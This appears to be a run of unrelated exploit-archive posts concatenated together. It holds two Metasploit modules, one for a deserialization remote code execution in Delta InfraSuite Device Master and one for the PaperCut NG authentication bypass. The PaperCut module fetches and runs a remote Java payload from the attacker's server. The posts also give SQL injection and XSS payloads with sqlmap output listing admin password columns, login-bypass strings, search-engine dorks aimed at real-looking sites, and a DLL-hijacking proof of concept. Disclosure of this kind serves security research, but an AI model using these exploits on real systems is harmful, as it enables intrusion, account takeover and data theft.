<pre><code># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::Udp<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Delta Electronics InfraSuite Device Master Deserialization',<br /> 'Description' => %q{<br /> Delta Electronics InfraSuite Device Master versions below v1.0.5 have an<br /> unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'<br /> method of the 'Device-Gateway-Status' process.<br /><br /> The 'ParseUDPPacket()' method reads user-controlled packet data and eventually<br /> calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,<br /> leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.<br /> },<br /> 'Author' => [<br /> 'Anonymous', # Vulnerability discovery<br /> 'Shelby Pace' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2023-1133'],<br /> ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/'],<br /> ['URL', 'https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133']<br /> ],<br /> 'Platform' => 'win',<br /> 'Privileged' => false,<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [<br /> 'Windows EXE Dropper',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :windows_dropper,<br /> 'CmdStagerFlavor' => :psh_invokewebrequest<br /> }<br /> ],<br /> [<br /> 'Windows CMD',<br /> {<br /> 'Arch' => [ARCH_CMD],<br /> 'Type' => :windows_cmd<br /> }<br /> ],<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-05-17',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS],<br /> 'Reliability' => [REPEATABLE_SESSION]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> Opt::RPORT(10100),<br /> OptInt.new('INFRASUITE_PORT', [ true, 'The port on which the InfraSuite Manager is listening', 80 ]),<br /> OptString.new('TARGETURI', [ true, 'The base path to the InfraSuite Manager', '/' ])<br /> ])<br /> end<br /><br /> def check<br /> print_status('Requesting the login page to determine if target is InfraSuite Device Master...')<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'rport' => datastore['INFRASUITE_PORT'],<br /> 'uri' => normalize_uri(target_uri.path, 'login.html')<br /> )<br /><br /> return CheckCode::Unknown unless res<br /><br /> unless res.body.include?('InfraSuite Manager Login')<br /> return CheckCode::Safe('Target does not appear to be InfraSuite Device Master.')<br /> end<br /><br /> print_status('Target is InfraSuite Device Master. Now attempting to determine version.')<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'rport' => datastore['INFRASUITE_PORT'],<br /> 'uri' => normalize_uri(target_uri.path, 'js/webcfg.js')<br /> )<br /><br /> unless res&.body&.include?('var devicemasterCfg')<br /> return CheckCode::Detected('Discovered InfraSuite Device Master, but couldn\'t determine version.')<br /> end<br /><br /> version = res.body.match(/version:'(\d+(?:\.\d+)+[a-zA-Z]?)'/)<br /> unless version && version.length > 1<br /> return CheckCode::Detected('Failed to find version string')<br /> end<br /><br /> version = version[1]<br /> vprint_status("Found version '#{version}' of InfraSuite Device Master")<br /> r_vers = Rex::Version.new(version)<br /><br /> return CheckCode::Appears if r_vers < Rex::Version.new('1.0.5')<br /><br /> CheckCode::Safe<br /> end<br /><br /> def exploit<br /> connect_udp<br /> case target['Type']<br /> when :windows_dropper<br /> execute_cmdstager<br /> when :windows_cmd<br /> execute_command(payload.encoded)<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> serialized = ::Msf::Util::DotNetDeserialization.generate(<br /> cmd,<br /> gadget_chain: :ClaimsPrincipal,<br /> formatter: :BinaryFormatter<br /> )<br /><br /> pkt = "\x01#{[ serialized.length ].pack('n')}#{serialized}"<br /> udp_sock.put(pkt)<br /> end<br /><br /> def cleanup<br /> disconnect_udp<br /> end<br />end<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/20872/ │<br />│ Vendor : Expert IT Solution │<br />│ Software : Expert Restaurant eCommerce 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /food_details.php<br /><br />GET parameter 'food' is vulnerable to RXSS<br /><br />https://www.website/food_details.php?food=e11c0"><script>alert(1)</script>uuf50<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/20872/ │<br />│ Vendor : Expert IT Solution │<br />│ Software : Expert Restaurant eCommerce 1.0 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /food_details.php<br /><br />https://www.website/food_details.php?food=[SQLI]<br /><br /><br />GET parameter 'food' is vulnerable to SQL Injection<br /><br />---<br />Parameter: food (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 17 columns<br /> Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'sagor_****_restu'<br /><br /><br />fetching tables<br /><br />[34 tables]<br />+--------------------------+<br />| add_to_cart_view |<br />| admin_url |<br />| contact_manage |<br />| currencies |<br />| customer_info |<br />| delivery_live_status |<br />| expense_manage |<br />| food_category |<br />| food_dish_manage |<br />| food_dish_vari_man |<br />| food_field_variant |<br />| food_field_variant_value |<br />| food_order_confirm |<br />| food_review |<br />| food_sub_category |<br />| food_tag |<br />| gallery_manage |<br />| hall_manage |<br />| income_manage |<br />| kitchen_live_sta |<br />| menu_manage |<br />| opening_manage |<br />| order_accounts |<br />| order_other_address |<br />| page_manage |<br />| payment_gateway |<br />| shipping_charge |<br />| site_setting |<br />| slider_manage |<br />| social_manage |<br />| sup_ad_log |<br />| table_book |<br />| table_manage |<br />| team_manage |<br />+--------------------------+<br /><br /><br />fetching columns for table 'sup_ad_log'<br /><br />[5 columns]<br />+----------------+--------------+<br />| Column | Type |<br />+----------------+--------------+<br />| status | varchar(100) |<br />| id | int(11) |<br />| sup_admin_name | varchar(100) |<br />| sup_pass | varchar(100) |<br />| sup_user | varchar(100) |<br />+----------------+--------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : mvc-shop v0.5 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5 |<br />| # Dork : |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Register a new membership and enter the membership control panel and choose to modify the member's profile and in the name field put any payload that suits you and then save the changes<br /><br />[+] Use Payload : <script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/chikoiquan.tanhongitcom/<br /> <br />== Greetings to :===========================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />============================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : NETXPERTS-CMS v0.1 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://netxperts.in/ | <br />| # Dork : "Designed by NETXPERTS" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user : 1'or'1'='1 & Pass : 1'or'1'='1<br /><br />[+] https://127.0.0.1/sivasudartravels/admin/production.php<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>Hi @ll,<br /><br />about a month ago Microsoft published HVCIScan-{amd,arm}64.exe, a<br />"Tool to check devices for compatibility with memory integrity (HVCI)"<br /><br />The "Install instructions" on the download page<br /><https://www.microsoft.com/en-us/download/105217> tell:<br /><br />| Download the hvciscan.exe for your system architecture (AMD64 or ARM64).<br />| From an elevated command window or PowerShell, run hvciscan.exe<br /><br />"ELEVATED" sounds good, especially when such a vulnerable tool is run<br />from the "Downloads" folder, where a file HVCIScan_amd64.exe.manifest,<br />HVCIScan_arm64.exe.manifest or VBSAPI.dll can be placed via "drive-by"<br />download or by the (unsuspecting) unelevated user who still abuses the<br />"protected administrator" account created during Windows setup.<br /><br />Oops, one step back: how did I determine<br />a) that HVCIScan-*.exe is vulnerable<br />b) these filenames?<br /><br />Open an UNELEVATED command window and run<br /> LINK.exe /DUMP /DEPENDENTS /LOADCONFIG /SUMMARY HVCIScan_amd64.exe<br />and/or<br /> LINK.exe /DUMP /DEPENDENTS /LOADCONFIG /SUMMARY HVCIScan_arm64.exe<br />then inspect the output.<br /><br />| Dump of file HVCIScan_amd64.exe<br />|<br />| File Type: EXECUTABLE IMAGE<br />|<br />| Image has the following dependencies:<br />|<br />| KERNEL32.dll<br />| msvcrt.dll<br />| VbsApi.dll<br /> ~~~~~~~~~~<br />| Section contains the following load config:<br />|<br />...<br />| 0000 Dependend load flags<br />...<br />| Summary<br />|<br />| 1000 .data<br />| 1000 .pdata<br />| 2000 .rdata<br />| 1000 .reloc<br />| 1000 .text<br /><br /><br />OUCH: the guys at M$FT built these tools without embedded "application<br /> manifest" (which would have been placed in a ".rsrc" section),<br /> so Windows will apply an external "application manifest", and<br /> without /DEPENDENTLOADFLAG:2048, so Windows will search dependent<br /> DLLs not listed as "Known DLL" in the "application directory"<br /> first.<br /><br />Both omissions^WBEGINNER'S MISTAKES allow to load and execute ARBITRARY<br />DLLs from ARBITRARY paths that run with the (ELEVATED) credentials of<br />the application!<br /><br />"Trustworthy Computing" anyone? Or "Security Development Lifecycle"?<br /><https://www.microsoft.com/en-us/securityengineering/sdl><br /><br /><br />Proof of concept #1:<br />~~~~~~~~~~~~~~~~~~~~<br /><br />a) Open an UNELEVATED command window in the directory where you saved<br /> HVCISCAN_amd64.exe respectively HVCISCAN_arm64.exe<br /><br />b) Create an empty file VbsApi.dll next to the executable:<br /><br /> COPY NUL: VbsApi.dll<br /><br />c) Run HVCISCAN_amd64.exe or HVCISCAN_arm64.exe and admire the error<br /> message that VbsApi.dll can't be loaded.<br /><br /><br />Building a VbsApi.dll with the exports required by HVCIScan-a??64.exe<br />to actually load and execute VbsApi.dll is left as an exercise to the<br />reader.<br /><br />See <https://skanthak.homepage.t-online.de/minesweeper.html> if you<br />need help.<br /><br /><br />Proof of concept #2:<br />~~~~~~~~~~~~~~~~~~~~<br /><br />a) Create the text file HVCISCAN_amd64.exe.manifest respectively<br /> HVCISCAN_arm64.exe.manifest with the following content next to<br /> HVCISCAN_amd64.exe respectively HVCISCAN_arm64.exe:<br /><br />--- HVCISCAN_a??64.exe.manifest ---<br /><?xml version="1.0" encoding="UTF-8" standalone="yes" ?><br /><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"><br /> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="KERNEL32.dll" /><br /> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="msvcrt.dll" /><br /> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="VbsApi.dll" /><br /> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"><br /> <security><br /> <requestedPrivileges><br /> <requestedExecutionLevel level="requireAdministrator" uiAccess="false" /><br /> </requestedPrivileges><br /> </security><br /> </trustInfo><br /></assembly><br />--- EOF ---<br /><br /> Replace the UNC path \\SERVER\SHARE\arbitrary.dll with any local or<br /> remote path where you can create the specified file.<br /><br /> NOTE: the section "trustInfo" is optional.<br /><br /> NOTE: KERNEL32.dll and MSVCRT.dll are "Known DLLs".<br /><br />b) Create an empty file arbitrary.dll in the specified network share or<br /> local directory:<br /><br /> COPY NUL: \\SERVER\SHARE\arbitrary.dll<br /><br />c) Run HVCISCAN_amd64.exe or HVCISCAN_arm64.exe and admire the error<br /> message that a required DLL or an entry point is not found.<br /><br /><br />Building \\SERVER\SHARE\arbitrary.dll with the exports required by<br />HVCIScan-a??64.exe to actually load and execute arbitrary.dll is left<br />as an exercise to the reader.<br /><br /><br />stay tuned, and far away from "tools" made in Redmond<br />Stefan Kanthak<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Anuranan SBAdmin 2 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 113.0.1 (64 bits) | <br />| # Vendor : https://anuranangroup.com/ | <br />| # Dork : Created by: Anuranan Group |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user&pass= admin <br /><br />[+] https://127.0.0.1/hpgreenlandresort.com/admin/login.aspx<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'cgi'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'PaperCut PaperCutNG Authentication Bypass',<br /> 'Description' => %q{<br /> This module leverages an authentication bypass in PaperCut NG. If necessary it<br /> updates Papercut configuration options, specifically the 'print-and-device.script.enabled'<br /> and 'print.script.sandboxed' options to allow for arbitrary code execution running in<br /> the builtin RhinoJS engine.<br /><br /> This module logs at most 2 events in the application log of papercut. Each event is tied<br /> to modifcation of server settings.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => ['catatonicprime'],<br /> 'References' => [<br /> ['CVE', '2023-27350'],<br /> ['ZDI', '23-233'],<br /> ['URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219'],<br /> ['URL', 'https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/'],<br /> ['URL', 'https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/'],<br /> ['URL', 'https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software']<br /> ],<br /> 'Stance' => Msf::Exploit::Stance::Aggressive,<br /> 'Targets' => [ [ 'Automatic Target', {}] ],<br /> 'Platform' => [ 'java' ],<br /> 'Arch' => ARCH_JAVA,<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2023-03-13',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => '9191',<br /> 'SSL' => 'false'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']),<br /> OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])<br /> ], self.class<br /> )<br /> @csrf_token = nil<br /> @config_cleanup = []<br /> end<br /><br /> def bypass_auth<br /> # Attempt to generate a session & recover the anti-csrf token for future requests.<br /> res = send_request_cgi(<br /> {<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'keep_cookies' => true,<br /> 'vars_get' => {<br /> 'service' => 'page/SetupCompleted'<br /> }<br /> }<br /> )<br /> return nil unless res && res.code == 200<br /><br /> vprint_good("Bypass successful and created session: #{cookie_jar.cookies[0]}")<br /><br /> # Parse the application version from the response for future decisions.<br /> product_details = res.get_html_document.xpath('//div[contains(@class, "product-details")]//span').children[1]<br /> if product_details.nil?<br /> product_details = res.get_html_document.xpath('//span[contains(@class, "version")]')<br /> end<br /> version_match = product_details.text.match('(?<major>[0-9]+)\.(?<minor>[0-9]+)')<br /> @version_major = Integer(version_match[:major])<br /> match = res.get_html_document.xpath('//script[contains(text(),"csrfToken")]').text.match(/var csrfToken ?= ?'(?<csrf>[^']*)'/)<br /> @csrf_token = match ? match[:csrf] : ''<br /> end<br /><br /> def get_config_option(name)<br /> # 1) do a quickfind (setting the tapestry state)<br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Origin' => full_uri<br /> },<br /> 'vars_post' => {<br /> 'service' => 'direct/1/ConfigEditor/quickFindForm',<br /> 'sp' => 'S0',<br /> 'Form0' => '$TextField,doQuickFind,clear',<br /> '$TextField' => name,<br /> 'doQuickFind' => 'Go'<br /> }<br /> }<br /> )<br /> # 2) parse and return the result<br /> return nil unless res && res.code == 200 && (html = res.get_html_document)<br /> return nil unless (td = html.xpath("//td[@class='propertyNameColumnValue']"))<br /> return nil unless td.count == 1 && td.text == name<br /><br /> value_input = html.xpath("//input[@name='$TextField$0']")<br /> value_input[0]['value']<br /> end<br /><br /> def set_config_option(name, value, rollback)<br /> # set name:value pair(s)<br /> current_value = get_config_option(name)<br /> if current_value == value<br /> vprint_good("Server option '#{name}' already set to '#{value}')")<br /> return<br /> end<br /><br /> vprint_status("Setting server option '#{name}' to '#{value}') was '#{current_value}'")<br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Origin' => full_uri<br /> },<br /> 'vars_post' => {<br /> 'service' => 'direct/1/ConfigEditor/$Form',<br /> 'sp' => 'S1',<br /> 'Form1' => '$TextField$0,$Submit,$Submit$0',<br /> '$TextField$0' => value,<br /> '$Submit' => 'Update'<br /> }<br /> }<br /> )<br /> fail_with Failure::NotVulnerable, "Could not update server config option '#{name}' to value of '#{value}'" unless res && res.code == 200<br /> # skip storing the cleanup change if this is rolling back a previous change<br /> @config_cleanup.push([name, current_value]) unless rollback<br /> end<br /><br /> def cleanup<br /> super<br /> if @config_cleanup.nil?<br /> return<br /> end<br /><br /> until @config_cleanup.empty?<br /> cfg = @config_cleanup.pop<br /> vprint_status("Rolling back '#{cfg[0]}' to '#{cfg[1]}'")<br /> set_config_option(cfg[0], cfg[1], true)<br /> end<br /> end<br /><br /> def primer<br /> payload_uri = get_uri<br /> script = <<~SCRIPT<br /> var urls = [new java.net.URL("#{payload_uri}.jar")];<br /> var cl = new java.net.URLClassLoader(urls).loadClass('metasploit.Payload').newInstance().main([]);<br /> s;<br /> SCRIPT<br /><br /> # The number of parameters passed changed in version 17.<br /> form0 = 'printerId,enablePrintScript,scriptBody,$Submit,$Submit$0'<br /> if @version_major > 16<br /> form0 += ',$Submit$1'<br /> end<br /> # 6) Trigger the code execution the printer_id<br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Origin' => full_uri<br /> },<br /> 'vars_post' => {<br /> 'service' => 'direct/1/PrinterDetails/$PrinterDetailsScript.$Form',<br /> 'sp' => 'S0',<br /> 'Form0' => form0,<br /> 'enablePrintScript' => 'on',<br /> '$Submit$1' => 'Apply',<br /> 'printerId' => 'l1001',<br /> 'scriptBody' => script<br /> }<br /> }<br /> )<br /> fail_with Failure::NotVulnerable, 'Failed to prime payload.' unless res && res.code == 200<br /> end<br /><br /> def check<br /> # For the check command<br /> bypass_success = bypass_auth<br /> if bypass_success.nil?<br /> return Exploit::CheckCode::Safe<br /> end<br /><br /> return Exploit::CheckCode::Vulnerable<br /> end<br /><br /> def exploit<br /> # Main function<br /> # 1) Bypass the auth using the SetupCompleted page & store the csrf_token for future requests.<br /> bypass_auth unless @csrf_token<br /> if @csrf_token.nil?<br /> fail_with Failure::NotVulnerable, 'Target is not vulnerable'<br /> end<br /><br /> # Sandboxing wasn't introduced until version 19<br /> if @version_major >= 19<br /> # 2) Enable scripts, if needed<br /> set_config_option('print-and-device.script.enabled', 'Y', false)<br /><br /> # 3) Disable sandboxing, if needed<br /> set_config_option('print.script.sandboxed', 'N', false)<br /> end<br /> # 5) Select the printer, this loads it into the tapestry session to be modified<br /> res = send_request_cgi(<br /> {<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Origin' => full_uri<br /> },<br /> 'vars_get' => {<br /> 'service' => 'direct/1/PrinterList/selectPrinter',<br /> 'sp' => 'l1001'<br /> }<br /> }<br /> )<br /> fail_with Failure::NotVulnerable, 'Unable to select [Template Printer]' unless res && res.code == 200<br /><br /> Timeout.timeout(datastore['HTTPDELAY']) { super }<br /> rescue Timeout::Error<br /> # When the server stop due to our timeout, this is raised<br /> end<br /><br /> def on_request_uri(cli, request)<br /> vprint_status("Sending payload for requested uri: #{request.uri}")<br /> send_response(cli, payload.raw)<br /> end<br /><br />end<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Magento eCommerce v 2.4.0 sensitive information disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://devdocs.magento.com/ | <br />| # Dork : Index of /var/log/ |<br />====================================================================================================================================<br /><br />poc : <br /><br /><br />[+] Keeping records in an unprotected folder, The logs contain sensitive information such as folder path,etc...<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] http://127.0.0.1/dawnfrozenfoods.com/var/log/<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : wizcyb interactive v2.0 auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://www.wizcyb.com/products.php | <br />| # Dork : powered by wizcyb interactive |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=1' or 1=1 -- - & pass=1' or 1=1 -- - <br /><br />[+] https://127.0.0.1/www/jobcapsindiacom/admin/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>